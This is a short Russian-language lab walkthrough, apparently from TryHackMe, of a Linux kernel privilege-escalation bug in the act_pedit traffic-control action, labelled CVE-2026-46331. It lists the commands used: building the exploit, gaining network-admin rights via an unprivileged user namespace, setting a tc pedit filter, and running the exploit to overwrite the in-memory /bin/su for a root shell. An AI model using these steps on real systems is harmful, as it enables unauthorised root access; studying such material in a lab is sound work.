
Описание и шаги эксплуатации уязвимости pedit COW (CVE-2026-46331)
Описание и шаги эксплуатации уязвимости pedit COW (CVE-2026-46331).
Это задание демонстрирует pedit COW, ошибку в ядре Linux в подсистеме управления трафиком, отвечающей за действие редактирования пакетов (act_pedit). Уязвимость позволяет непривилегированному пользователю перезаписать хранящуюся в памяти копию setuid-root бинарного файла, фактически получая root-оболочку, не затрагивая сам файл на диске.
Среда запускается от имени непривилегированного пользователя (karen).
id
cd ~/packet_edit_meme
make packet_edit_meme
Обычно настройка управления трафиком требует привилегий CAP_NET_ADMIN, которых нет у обычного пользователя. Я использовал непривилегированные пользовательские пространства имён, чтобы получить эту возможность.
unshare -r -n
Внутри пространства имён я настроил дисциплину очереди clsact и применил фильтр для запуска действия pedit.
# Clean up any existing configurations if needed
tc qdisc del dev lo clsact
# Setup the qdisc and filter
tc qdisc add dev lo clsact
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
### 5. Запуск эксплойта
После настройки среды я вышел из root-оболочки и запустил эксплойт от имени непривилегированного пользователя.
exit ./packet_edit_meme
### 5. Финальный результат
Эксплойт успешно перезаписал запись для /bin/su, предоставив интерактивную root-оболочку.
THM{YOUR_FLAG_HERE}